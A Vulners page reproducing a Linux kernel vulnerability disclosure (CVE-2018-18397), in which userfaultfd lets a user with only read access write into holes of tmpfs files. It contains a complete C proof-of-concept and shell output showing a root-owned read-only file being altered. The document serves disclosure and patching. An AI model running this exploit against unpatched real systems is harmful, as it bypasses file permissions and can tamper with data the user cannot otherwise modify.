Vulners
Lucene search
Linux userfaultfd tmpfs File Permission Bypass
10
`Linux: userfaultfd bypasses tmpfs file permissions
CVE-2018-18397
Using the userfaultfd API, it is possible to first register a
userfaultfd region for any VMA that fulfills vma_can_userfault():
It must be an anonymous VMA (->vm_ops==NULL), a hugetlb VMA
(VM_HUGETLB), or a shmem VMA (->vm_ops==shmem_vm_ops). This means that
it is, for example, possible to register userfaulfd regions for shared
readonly mappings of tmpfs files.
Afterwards, the userfaultfd API can be used on such a region to
(atomically) write data into holes in the file's mapping. This API
also works on readonly shared mappings.
This means that an attacker with read-only access to a tmpfs file that
contains holes can write data into holes in the file.
Reproducer:
First, as root:
=====================
root@debian:~# cd /dev/shm
root@debian:/dev/shm# umask 0022
root@debian:/dev/shm# touch uffd_test
root@debian:/dev/shm# truncate --size=4096 uffd_test
root@debian:/dev/shm# ls -l uffd_test
-rw-r--r-- 1 root root 4096 Oct 16 19:25 uffd_test
root@debian:/dev/shm# hexdump -C uffd_test
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001000
root@debian:/dev/shm#
=====================
Then, as a user (who has read access, but not write access, to that
file):
=====================
user@debian:~/uffd$ cat uffd_demo.c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <err.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdio.h>
static int uffd;
static void *uf_mapping;
int main(int argc, char **argv) {
int rw_open_res = open("/dev/shm/uffd_test", O_RDWR);
if (rw_open_res == -1)
perror("can't open for writing as expected");
else
errx(1, "unexpected write open success");
int mfd = open("/dev/shm/uffd_test", O_RDONLY);
if (mfd == -1) err(1, "tmpfs open");
uf_mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, mfd, 0);
if (uf_mapping == (void*)-1) err(1, "shmat");
// Documentation for userfaultfd:
// <a href="http://man7.org/linux/man-pages/man2/userfaultfd.2.html" title="" class="" rel="nofollow">http://man7.org/linux/man-pages/man2/userfaultfd.2.html</a>
// <a href="http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html" title="" class="" rel="nofollow">http://man7.org/linux/man-pages/man2/ioctl_userfaultfd.2.html</a>
// <a href="https://blog.lizzie.io/using-userfaultfd.html" title="" class="" rel="nofollow">https://blog.lizzie.io/using-userfaultfd.html</a>
uffd = syscall(__NR_userfaultfd, 0);
if (uffd == -1) err(1, "userfaultfd");
struct uffdio_api api = { .api = 0xAA, .features = 0 };
if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");
struct uffdio_register reg = {
.range = {
.start = (unsigned long)uf_mapping,
.len = 0x1000
},
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, ®)) err(1, "REGISTER");
char buf[0x1000] = {'A', 'A', 'A', 'A'};
struct uffdio_copy copy = {
.dst = (unsigned long)uf_mapping,
.src = (unsigned long)buf,
.len = 0x1000,
.mode = 0
};
if (ioctl(uffd, UFFDIO_COPY, ©)) err(1, "copy");
if (copy.copy != 0x1000) errx(1, "copy len");
printf("x: 0x%08x\n", *(unsigned int*)uf_mapping);
return 0;
}
user@debian:~/uffd$ gcc -o uffd_demo uffd_demo.c -Wall
user@debian:~/uffd$ ./uffd_demo
can't open for writing as expected: Permission denied
x: 0x41414141
user@debian:~/uffd$
=====================
And now again as root:
=====================
root@debian:/dev/shm# hexdump -C uffd_test
00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001000
=====================
I asked MITRE for a CVE when I started writing the bug report, and
they've already given me CVE-2018-18397.
By the way, another interesting thing: Apparently userfaultfd even
lets you write beyond the end of the file, and the writes become
visible if the file is subsequently truncated to a bigger size?
That seems wrong.
As root, create an empty file:
=====================
root@debian:/dev/shm# rm uffd_test
root@debian:/dev/shm# touch uffd_test
root@debian:/dev/shm# ls -l uffd_test
-rw-r--r-- 1 root root 0 Oct 16 19:44 uffd_test
root@debian:/dev/shm#
=====================
Now as a user, use userfaultfd to write into it:
=====================
user@debian:~/uffd$ ./uffd_demo
can't open for writing as expected: Permission denied
x: 0x41414141
user@debian:~/uffd$
=====================
Afterwards, to root, the file still looks empty, until it is truncated
to a bigger size:
=====================
root@debian:/dev/shm# ls -l uffd_test
-rw-r--r-- 1 root root 0 Oct 16 19:44 uffd_test
root@debian:/dev/shm# hexdump -C uffd_test
root@debian:/dev/shm# truncate --size=4096 uffd_test
root@debian:/dev/shm# hexdump -C uffd_test
00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001000
root@debian:/dev/shm#
=====================
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: jannh
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2018 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00067